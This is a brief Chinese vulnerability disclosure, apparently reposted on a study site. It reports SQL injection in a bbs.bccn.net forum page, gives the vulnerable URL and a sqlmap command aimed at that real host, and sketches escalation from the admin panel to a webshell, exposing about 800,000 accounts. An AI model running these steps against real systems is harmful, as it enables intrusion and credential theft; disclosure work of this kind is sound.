编程中国旗下 论坛 sql注入+webshell,近80W的程序员账号密码泄露!!!
存在注射参数:fid 注射URL:
http://bbs.bccn.net/zzz/bzml/view.php?fid=*sqlmap -u http://bbs.bccn.net/zzz/bzml/view.php?fid=* --dbs 论坛Discuz版本为6.1,得到管理员密码后登陆后台,自写wordwrap和unserialize导入一句话代码,获取webshell
将近80W的程序员账号、密码、邮箱存在泄露威胁
修复方案:
赶紧修复
查看更多关于编程中国论坛sql注入可获取Webshell - 网站安全 -的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15162